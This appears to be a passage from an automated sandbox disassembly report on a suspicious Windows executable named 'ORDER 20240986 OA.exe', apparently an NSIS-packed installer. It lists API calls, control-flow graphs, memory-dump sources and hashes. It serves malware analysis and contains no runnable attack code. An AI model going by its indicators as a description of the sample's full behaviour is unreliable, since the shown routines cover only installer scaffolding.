                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 0040509B
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004050AB
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004051FC
                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 0040525C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                  • String ID: $M$N
                                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                                  • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                                                                                                  • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                                                                                                  • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                                                                                                  • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 6FBB121B: GlobalAlloc.KERNELBASE(00000040,?,6FBB123B,?,6FBB12DF,00000019,6FBB11BE,-000000A0), ref: 6FBB1225
                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FBB1C6F
                                                                                                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 6FBB1CB7
                                                                                                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 6FBB1CC1
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBB1CD4
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FBB1DB6
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FBB1DBB
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FBB1DC0
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBB1FAA
                                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 6FBB2144
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 6FBB21B9
                                                                                                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 6FBB21CA
                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 6FBB2224
                                                                                                                                                  • lstrlenW.KERNEL32(00000808), ref: 6FBB223E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2336495745.000000006FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FBB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2336461963.000000006FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336529386.000000006FBB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336658892.000000006FBB5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6fbb0000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 245916457-0
                                                                                                                                                  • Opcode ID: 06fb74a1144f34e3c4adab433feed309fcd3d8f949e13001721e5f497d49b4c7
                                                                                                                                                  • Instruction ID: 4d3d67633fbd321724e34ed39483a5a7f53490873ccc458981bf7732e50cac70
                                                                                                                                                  • Opcode Fuzzy Hash: 06fb74a1144f34e3c4adab433feed309fcd3d8f949e13001721e5f497d49b4c7
                                                                                                                                                  • Instruction Fuzzy Hash: 8A229971D04689EEDB118FB8E9846FEB7B0FF06315F54462ED1A5E6280DB70A681CB50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 719 4059a9-4059cf call 405c74 722 4059d1-4059e3 DeleteFileW 719->722 723 4059e8-4059ef 719->723 726 405b65-405b69 722->726 724 4059f1-4059f3 723->724 725 405a02-405a12 call 406297 723->725 727 405b13-405b18 724->727 728 4059f9-4059fc 724->728 732 405a21-405a22 call 405bb8 725->732 733 405a14-405a1f lstrcatW 725->733 727->726 731 405b1a-405b1d 727->731 728->725 728->727 734 405b27-405b2f call 4065da 731->734 735 405b1f-405b25 731->735 736 405a27-405a2b 732->736 733->736 734->726 743 405b31-405b45 call 405b6c call 405961 734->743 735->726 739 405a37-405a3d lstrcatW 736->739 740 405a2d-405a35 736->740 742 405a42-405a5e lstrlenW FindFirstFileW 739->742 740->739 740->742 744 405a64-405a6c 742->744 745 405b08-405b0c 742->745 759 405b47-405b4a 743->759 760 405b5d-405b60 call 4052ff 743->760 748 405a8c-405aa0 call 406297 744->748 749 405a6e-405a76 744->749 745->727 747 405b0e 745->747 747->727 761 405aa2-405aaa 748->761 762 405ab7-405ac2 call 405961 748->762 753 405a78-405a80 749->753 754 405aeb-405afb FindNextFileW 749->754 753->748 758 405a82-405a8a 753->758 754->744 757 405b01-405b02 FindClose 754->757 757->745 758->748 758->754 759->735 763 405b4c-405b5b call 4052ff call 40605d 759->763 760->726 761->754 764 405aac-405ab5 call 4059a9 761->764 772 405ae3-405ae6 call 4052ff 762->772 773 405ac4-405ac7 762->773 763->726 764->754 772->754 776 405ac9-405ad9 call 4052ff call 40605d 773->776 777 405adb-405ae1 773->777 776->754 777->754
                                                                                                                                                  APIs
                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059D2
                                                                                                                                                  • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A1A
                                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A3D
                                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A43
                                                                                                                                                  • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A53
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                  • String ID: "C:\Users\user\Desktop\ORDER 20240986 OA.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                  • API String ID: 2035342205-503834662
                                                                                                                                                  • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                                                                                                  • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                                                                                                  • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                                                                                                  • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 1077 4065da-4065ee FindFirstFileW 1078 4065f0-4065f9 FindClose 1077->1078 1079 4065fb 1077->1079 1080 4065fd-4065fe 1078->1080 1079->1080
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,?,?,74DF3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065E5
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004065F1
                                                                                                                                                  Strings
                                                                                                                                                  • pOz, xrefs: 004065DB
                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\nsx1318.tmp, xrefs: 004065DA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsx1318.tmp$pOz
                                                                                                                                                  • API String ID: 2295610775-2114362763
                                                                                                                                                  • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                                  • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                                                                                                  • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                                  • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000028,?,?,0040406E), ref: 00404251
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                  • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                                                                                  • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                                                                                                  • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                                                                                  • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 261 403d35-403d47 262 403e88-403e97 261->262 263 403d4d-403d53 261->263 265 403ee6-403efb 262->265 266 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 262->266 263->262 264 403d59-403d62 263->264 269 403d64-403d71 SetWindowPos 264->269 270 403d77-403d7a 264->270 267 403f3b-403f40 call 40425a 265->267 268 403efd-403f00 265->268 266->265 283 403f45-403f60 267->283 273 403f02-403f0d call 401389 268->273 274 403f33-403f35 268->274 269->270 276 403d94-403d9a 270->276 277 403d7c-403d8e ShowWindow 270->277 273->274 296 403f0f-403f2e SendMessageW 273->296 274->267 282 4041db 274->282 279 403db6-403db9 276->279 280 403d9c-403db1 DestroyWindow 276->280 277->276 287 403dbb-403dc7 SetWindowLongW 279->287 288 403dcc-403dd2 279->288 285 4041b8-4041be 280->285 286 4041dd-4041e4 282->286 290 403f62-403f64 call 40140b 283->290 291 403f69-403f6f 283->291 285->282 298 4041c0-4041c6 285->298 287->286 294 403e75-403e83 call 404275 288->294 295 403dd8-403de9 GetDlgItem 288->295 290->291 292 403f75-403f80 291->292 293 404199-4041b2 DestroyWindow EndDialog 291->293 292->293 300 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 292->300 293->285 294->286 301 403e08-403e0b 295->301 302 403deb-403e02 SendMessageW IsWindowEnabled 295->302 296->286 298->282 299 4041c8-4041d1 ShowWindow 298->299 299->282 331 403fd5-403fda 300->331 332 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 300->332 305 403e10-403e13 301->305 306 403e0d-403e0e 301->306 302->282 302->301 310 403e21-403e26 305->310 311 403e15-403e1b 305->311 309 403e3e-403e43 call 4041e7 306->309 309->294 314 403e5c-403e6f SendMessageW 310->314 316 403e28-403e2e 310->316 311->314 315 403e1d-403e1f 311->315 314->294 315->309 319 403e30-403e36 call 40140b 316->319 320 403e45-403e4e call 40140b 316->320 327 403e3c 319->327 320->294 329 403e50-403e5a 320->329 327->309 329->327 331->332 335 40401b-40401c 332->335 336 40401e 332->336 337 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404050-404061 SendMessageW 337->338 339 404063 337->339 340 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 338->340 339->340 340->283 351 4040ae-4040b0 340->351 351->283 352 4040b6-4040ba 351->352 353 4040d9-4040ed DestroyWindow 352->353 354 4040bc-4040c2 352->354 353->285 356 4040f3-404120 CreateDialogParamW 353->356 354->282 355 4040c8-4040ce 354->355 355->283 357 4040d4 355->357 356->285 358 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 40417f-404197 ShowWindow call 40425a 358->363 363->285
                                                                                                                                                  APIs
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                                                                                                  • ShowWindow.USER32(?), ref: 00403D8E
                                                                                                                                                  • DestroyWindow.USER32 ref: 00403DA2
                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F1D
                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00404011
                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404027
                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404046
                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                                                                                                  • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                                                                                                  • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                                  • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                                                                                  • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                                                                                                  • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                                                                                  • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 366 403987-40399f call 406671 369 4039a1-4039ac GetUserDefaultUILanguage call 4061de 366->369 370 4039b3-4039ea call 406165 366->370 374 4039b1 369->374 375 403a02-403a08 lstrcatW 370->375 376 4039ec-4039fd call 406165 370->376 377 403a0d-403a36 call 403c5d call 405c74 374->377 375->377 376->375 383 403ac8-403ad0 call 405c74 377->383 384 403a3c-403a41 377->384 390 403ad2-403ad9 call 4062b9 383->390 391 403ade-403b03 LoadImageW 383->391 384->383 385 403a47-403a6f call 406165 384->385 385->383 395 403a71-403a75 385->395 390->391 393 403b84-403b8c call 40140b 391->393 394 403b05-403b35 RegisterClassW 391->394 408 403b96-403ba1 call 403c5d 393->408 409 403b8e-403b91 393->409 396 403c53 394->396 397 403b3b-403b7f SystemParametersInfoW CreateWindowExW 394->397 399 403a87-403a93 lstrlenW 395->399 400 403a77-403a84 call 405b99 395->400 402 403c55-403c5c 396->402 397->393 403 403a95-403aa3 lstrcmpiW 399->403 404 403abb-403ac3 call 405b6c call 406297 399->404 400->399 403->404 407 403aa5-403aaf GetFileAttributesW 403->407 404->383 411 403ab1-403ab3 407->411 412 403ab5-403ab6 call 405bb8 407->412 418 403ba7-403bc1 ShowWindow call 406601 408->418 419 403c2a-403c32 call 4053d2 408->419 409->402 411->404 411->412 412->404 426 403bc3-403bc8 call 406601 418->426 427 403bcd-403bdf GetClassInfoW 418->427 424 403c34-403c3a 419->424 425 403c4c-403c4e call 40140b 419->425 424->409 430 403c40-403c47 call 40140b 424->430 425->396 426->427 428 403be1-403bf1 GetClassInfoW RegisterClassW 427->428 429 403bf7-403c1a DialogBoxParamW call 40140b 427->429 428->429 435 403c1f-403c28 call 4038d7 429->435 430->409 435->402
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                                    • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00000000), ref: 004039A1
                                                                                                                                                    • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                                                                                                  • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00000000), ref: 00403A08
